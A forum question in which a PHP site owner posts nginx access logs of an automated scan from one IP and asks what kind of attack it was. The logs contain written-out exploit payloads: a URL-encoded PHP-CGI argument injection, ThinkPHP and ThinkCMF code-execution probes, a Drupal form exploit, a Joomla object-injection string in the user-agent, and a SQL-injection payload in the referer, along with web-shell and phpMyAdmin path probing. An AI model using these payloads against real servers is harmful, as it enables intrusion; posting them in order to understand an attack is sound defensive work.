
I am using PHP as a server-side language, and I don't use a CMS or framework. From the nginx log, the attack on the website seems obvious.

I wonder what kind of attack the attacker attempted.

The attacker sent 941 malicious queries over a period of about 5 minutes, some of which are listed below.

--- Nginx Log 1 ---

[23/Mar/2020:03:24:02 +0000] "POST /Admin06f42d34/Login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:03 +0000] "GET /l.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86"
[23/Mar/2020:03:24:04 +0000] "GET /phpinfo.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86"
[23/Mar/2020:03:24:05 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86"
[23/Mar/2020:03:24:06 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:06 +0000] "POST /bbs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:06 +0000] "POST /forum.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:07 +0000] "POST /forums.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:08 +0000] "POST /bbs/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:08 +0000] "POST /forum/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:08 +0000] "POST /forums/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86"
[23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86"
[23/Mar/2020:03:24:11 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86"
[23/Mar/2020:03:24:20 +0000] "POST /%62%61%73%65/%70%6F%73%74%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" "218.75.30.86"
[23/Mar/2020:03:24:20 +0000] "GET /webdav/ HTTP/1.1" 301 178 "-" "Mozilla/5.0" "218.75.30.86"
[23/Mar/2020:03:24:21 +0000] "GET /%69%73%70%69%72%69%74/%69%6D/%75%70%6C%6F%61%64%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:21 +0000] "GET /help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:22 +0000] "GET /java.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:22 +0000] "GET /_query.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:23 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:23 +0000] "GET /db_cts.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:23 +0000] "GET /db_pma.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /logon.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /help-e.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /license.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /log.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:25 +0000] "GET /hell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:25 +0000] "GET /pmd_online.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:25 +0000] "GET /x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:26 +0000] "GET /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:26 +0000] "GET /htdocs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:27 +0000] "GET /b.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:27 +0000] "GET /sane.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:28 +0000] "GET /desktop.ini.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:28 +0000] "GET /z.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:28 +0000] "GET /lala.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:29 +0000] "GET /lala-dpr.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log 2 ---

[23/Mar/2020:03:24:37 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:38 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:38 +0000] "GET /scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /PMA/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:40 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:40 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log 3 ---

[23/Mar/2020:03:24:41 +0000] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:41 +0000] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:42 +0000] "GET /plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:42 +0000] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:42 +0000] "GET /weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:44 +0000] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:44 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:44 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /Joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /d7.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:46 +0000] "GET /rxr.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:46 +0000] "GET /1x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:46 +0000] "GET /home.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log 4 ---

[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/modules/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:08 +0000] "POST /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:09 +0000] "POST /data/admin/help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:09 +0000] "POST /12.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "POST /ecmsmod.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:11 +0000] "GET /solr/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:12 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" "218.75.30.86"
[23/Mar/2020:03:29:12 +0000] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:12 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:56:\x22die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD, 218.75.30.86"
[23/Mar/2020:03:29:13 +0000] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 301 178 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\x22id\x22;s:3:\x22'/*\x22;s:3:\x22num\x22;s:141:\x22*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log 5 ---

[23/Mar/2020:03:29:13 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:14 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:14 +0000] "GET /pmd/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:14 +0000] "GET /pma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /PMA/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /PMA2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /pmamy/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /pmamy2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:16 +0000] "GET /mysql/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:16 +0000] "GET /admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
